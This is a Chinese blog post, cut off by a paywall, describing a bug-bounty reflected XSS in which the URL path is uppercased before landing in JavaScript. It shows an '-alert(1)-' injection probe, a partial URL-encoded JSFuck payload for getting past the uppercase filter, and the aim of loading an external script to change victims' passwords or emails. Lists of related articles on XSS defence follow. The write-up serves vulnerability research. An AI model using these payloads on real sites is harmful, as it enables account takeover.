如何绕过大写过滤器实现XSS攻击

最新推荐文章于 2024-05-06 17:26:17 发布
最新推荐文章于 2024-05-06 17:26:17 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 安全 文章标签: xss

在这里插入图片描述

虽然我们不是在安全公司工作,但喜欢参加Hackerone上的漏洞悬赏项目,喜欢寻找漏洞。

而最近发现的漏洞让我感觉javascript代码中的注入漏洞的确会让人防不胜防。

我们在目标网站上找到了一个和XSS有关的漏洞,其中网页涉及到某种谷歌分析代码,可通过URL进行XSS攻击。

http://website.com/dir/subdir

以上URL的后半部分会直接出现在javascript代码中:

function("/DIR/SUBDIR",params);

通过使用Burp suite,我尝试在URL末尾添加-alert(1)-来进行攻击,即[http://website.com/dir/subdir/](http://website.com/dir/subdir/)"-alert(1)-"

在这里插入图片描述

结果浏览器告诉我们找不到函数ALERT(1),看来GET参数会被转换为大写。

然后我们开始测试网站过滤器到底会过滤什么内容,结果发现</script>//\. 会受到影响,但是其他敏感字符东西"'[]{ }并不会。

所以,我们需要利用这些白名单字符构建payload。很快我们便想到了jsfuck.com网站,不过它生成的payload虽然可以绕过大写过滤器,但太长了。

在这里插入图片描述

同时,需要说明的是,在Hackerone的悬赏项目中,如果只是执行alert(1),那么只能算是一个低级XSS(奖励较低)。我们希望将此漏洞的等级升级为高或严重,这就需要证明漏洞可加载外部JS文件,且在和用户无任何交互的情况下就可执行任意Web操作。

以下是一个用于WordPress的payload,我们希望能往目标注入类似于这个payload的外部脚本,非法更改帐户密码或email。

在这里插入图片描述

而在JsFuck网站中,一个简单的alert(1)会被转换为如下代码:

"-%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%5B(%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!
最低0.47元/天 解锁文章
NOSEC2019
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vue xss 存在_给XSS加点S
weixin_36090220的博客
01-04 1035
TOC:约定本文中出现由花括号包裹的内容为服务端进行 html 字符串拼接的动态内容:{ userData },在其他文章中经常表现为 <%= userData >。本文中所使用的关键词:“用户数据”,与“非受信数据”同义。XSS 简介XSS 是一种代码注入攻击,在受害者浏览器上注入恶意代码并执行,本质是前后端渲染不受信任的用户数据导致的安全问题。不受信任的用户数据指的是由用户提供的数...
XSS系列二:基于vue搭建的网站如何防范XSS攻击
川端小树的博客
10-02 5506
1.对于从接口请求的数据,尽量使用{{}}加载,而不是v-html vue中的大括号会把数据解释为普通文本。通常如果要解释成html代码则要用v-html。而此指令相当于innerHTML。虽然像innerHTML一样不会直接输出script标签,但也可以输出img,iframe等标签。 vue文档关于v-html的说明如下所示: 2.对用v-html和innerHTML加载的客户信息进行转义 如果显示内容里面有html片段,一定需要用v-html或者innerHTML加载,例...
XSS攻击过滤器实现
EvanDeveloper的专栏
07-12 1659
一、XSS简介 百度百科的解释: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制,获取用户的一些信息。 二、XSS分类 xss攻击可以分成两种类型: 非持久型攻击 持久型攻
XSSXSS漏洞详细指南
最新发布
大河之犬的博客
05-06 1070
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,攻击者通过在网页上注入恶意脚本代码,从而在用户的浏览器上执行恶意操作。这些脚本可以是 JavaScript、HTML 或其他网页脚本语言。一旦用户在受感染的网页上进行交互,如点击链接或填写表单,恶意脚本就会在用户浏览器上执行,从而导致多种安全问题,包括但不限于:XSS 漏洞通常出现在没有充分验证用户输入的地方,比如网站的搜索框、评论区、表单提交等。预防 XSS 攻击的方法包括对用户输入进行严格过滤和转义,使用安全的开发
后端防止xss攻击两种方法
Koikoi12的博客
12-13 7119
一.写filter 新增 XssFilter 拦截用户提交的参数,进行相关的转义和黑名单排除,完成相关的业务逻辑。在整个过程中最核心的是通过包装用户的原始请求,创建新的 requestwrapper 保证请求流在后边的流程可以重复读。 1、使用spring的HtmlUtils,可以使用StringEscapeUtils 中的过滤方法 /** * 解决XSS跨站脚本攻击和sql注入攻击,使用spring的HtmlUtils,可以使用StringEscapeUtils 中的过滤方法 */ public c
Vue解决xss脚本攻击
youngerxsd的博客
05-09 1689
XSS(Cross Site Scripting)攻击是一种常见的Web攻击方式,它利用了Web应用程序中存在的安全漏洞,向Web页面中注入恶意的脚本代码,从而在用户访问页面时执行这些脚本,达到攻击者所期望的目的。XSS攻击通常分为两类:反射型和存储型。反射型XSS攻击,也称为非持久性XSS攻击,是攻击者通过发送恶意链接或篡改表单数据等方式,向服务器提交带有恶意脚本的请求,服务器将这些恶意脚本注入到Web页面的响应中,当用户访问该页面时,恶意脚本就会被执行,从而实现攻击。
记录几种XSS绕过方式1
08-03
本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
vue 过滤器filter实例详解
10-18
过滤器通常用于格式化数据,如日期格式化、字符串首字母大写等。Vue.js 提供了内置的过滤器以及自定义过滤器功能,使得我们可以根据项目需求定制自己的数据处理逻辑。 过滤器的使用方式主要有两种: 1. **管道操作...
Smarty模板变量调节器用法分析
10-22
在Smarty中,变量调节器(Modifiers)是用于处理和修饰模板变量的一种强大工具,它们提供了多种内置的处理函数,可以方便地对变量进行格式化、转换或过滤。 1. **变量修饰器的使用方式**: 在Smarty模板中,变量...
Vue filter介绍及其使用详解
10-19
在Vue.js中,过滤器(filters)是用于转换数据的一种机制,允许开发者在模板中对数据进行处理,如格式化、筛选或修改,然后显示出来。本文将深入探讨Vue filter的介绍及其使用方法。 ### Vue Filter的基本概念 Vue...
模板注入与_FLASK.pdf
01-02
在`render_template_string`内部,它会调用`_render`方法,进一步调用Jinja2模板引擎的`render`方法,并传递当前应用的上下文,这使得攻击者有机会利用Jinja2的全局变量和过滤器。 **Jinja2模板引擎的安全性** ...
vue中xss详细配置
沃德天,倪维胜么,捺莫帅?
09-25 3701
xss文件 import xss from 'xss'; // 导入xss包 const options = { // 白名单 whiteList:{ a: ['style', 'href', 'title', 'target'], p:['style'], section: ['style'], strong: ['style'], abbr: ["title",'style'], addres
网络安全---Vue中解决XSS(跨站脚本攻击)
总结、沉淀、提升
02-26 1124
Vue中解决XSS的办法是...
vue中使用v-html防止xss注入
aGreetSmile的博客
06-25 1944
通常我们处理xss攻击会使用一个xss的npm包来过滤xss攻击代码。所以我们要做的就是给指令的value包上一层xss函数。这样我们就能覆盖html指令。这样我们就从源头解决了html指令存在的潜在xss攻击。3.在vue.config.js中覆写html指令。2.引入xss包并挂载到vue原型上。解决html指令存在的xss漏洞问题。
API安全之 - XSS 攻击,及防御 XSS 攻击
ws - 兮的博客空间
12-03 1167
一、什么是XSS攻击 XSS攻击使用Javascript脚本注入进行攻击 例如在提交表单后,展示到另一个页面,可能会受到XSS脚本注入,读取本地cookie远程发送给黑客服务器端。 二、XSS 攻击应用场景 表单提交后页面展示的地方 1、api 接口携带 <script> 参数,返回页面输出展示参数 2、如评论回复,评论 <script>alert('sss')</s...
vue-router踩坑
czx3387170的博客
05-18 992
1.vue3版本之后可以使用VUE add安装路由和vuex(因为他们不是插件) vue add router vue add vuex 2.在属性里面要使用对象的表达式,必须要用在动态绑定值里面:( <router-linke :to="{name:about}">about</router-link>) ...
vue项目 v-html存在植入xss攻击怎么解决
热门推荐
zhaoletf的博客
03-23 1万+
然后在需要使用v-html的页面,将v-html改为 v-dompurify-html即可解决xss攻击问题.但是这样写的话也是比较麻烦的,如果这个项目已经做的很大了,在一个个的去改,这样费事费力,还不易于后期开发的维护.当人员离职入职的时候容易造成交接不到位的问题. ...
VUE框架用户提交页面信息展示与XSS攻击原理剖析------VUE框架
春风若有怜花意,可否许我再少年
12-01 967
VUE框架用户提交页面信息展示与XSS攻击原理剖析------VUE框架
Springboot结合ESAPI——配置XSS防御过滤
jxwen1的博客
10-19 1万+
本文来源与几篇优秀文章的整合,但整合后真实可用, 在此记录以便往后使用 文章地址:https://blog.csdn.net/frog4/article/details/81876462https://blog.csdn.net/julycaka/article/details/78467291 https://blog.csdn.net/fengyao1995/article/de...
springboot如何实现使用过滤器防止xss攻击和sql注入
06-09
Spring Boot可以通过使用过滤器(Filter)来防止XSS攻击和SQL注入。 1. 防止XSS攻击:可以使用过滤器对请求参数进行过滤,将其中的特殊字符进行转义,从而避免XSS攻击。例如,可以使用Jsoup库中的`clean`方法来过滤HTML标签。 2. 防止SQL注入:可以使用过滤器对请求参数进行过滤,将其中的特殊字符进行转义,从而避免SQL注入。例如,可以使用`org.springframework.web.util.HtmlUtils.htmlEscape`方法对请求参数进行转义。 以下是一个示例过滤器的代码: ```java @Component @Order(Ordered.HIGHEST_PRECEDENCE) public class XssSqlFilter implements Filter { @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { HttpServletRequest req = (HttpServletRequest) request; // XSS过滤 XssHttpServletRequestWrapper xssRequest = new XssHttpServletRequestWrapper(req); // SQL注入过滤 SqlFilterRequestWrapper sqlRequest = new SqlFilterRequestWrapper(xssRequest); chain.doFilter(sqlRequest, response); } } ``` 其中,`XssHttpServletRequestWrapper`和`SqlFilterRequestWrapper`分别是对`HttpServletRequest`的包装类,用于在请求中过滤XSS和SQL注入。 需要注意的是,过滤器的执行顺序可以通过实现`Ordered`接口来指定,从而保证过滤器的正确执行顺序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值